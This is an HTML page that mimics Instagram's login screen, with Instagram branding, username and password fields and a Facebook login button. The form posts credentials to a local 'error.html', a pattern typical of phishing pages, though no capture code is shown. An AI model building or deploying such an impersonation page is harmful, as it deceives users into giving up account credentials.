<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="shortcut icon" href="res/instagram-new.png">
</head>
<body class="bg-gray-100 flex items-center justify-center h-screen">
    <div class="flex flex-col items-center">
        <div class="bg-white p-10 rounded-xl shadow-md w-96">
            <div class="flex justify-center mb-6">
                <img src="res/ig.png" alt="Instagram Logo" class="w-40">
            </div>
            <form action="error.html" method="POST" class="space-y-4">
                <input type="text" name="username" placeholder="Username" class="w-full p-2 border rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-400">
                <div class="relative">
                    <input type="password" name="password" placeholder="Password" class="w-full p-2 border rounded-lg focus:outline-none focus:ring-2 focus:ring-blue-400">
                    <a href="error.html" class="absolute right-2 top-2 text-blue-500 text-sm">Forgot?</a>
                </div>
                <button type="submit" class="w-full bg-blue-500 text-white p-2 rounded-lg font-semibold hover:bg-blue-600">Log In</button>
            </form>
            <div class="flex items-center my-4">
                <hr class="flex-grow border-gray-300">
                <span class="px-2 text-gray-500">OR</span>
                <hr class="flex-grow border-gray-300">
            </div>
            <button onclick='window.location="error.html"' class="w-full flex items-center justify-center bg-blue-800 text-white p-2 rounded-lg font-semibold hover:bg-blue-900">
                <img src="res/facebook.png" alt="Facebook" class="w-5 h-5 mr-2"> Continue with Facebook
            </button>
        </div>
        <div class="mt-4 text-center bg-white p-4 rounded-xl shadow-md w-96">
            <p>Don't have an account? <a href="https://www.instagram.com/accounts/emailsignup/?hl=en" class="text-blue-500 font-semibold">Sign up</a></p>
        </div>
    </div>
</body>
</html>
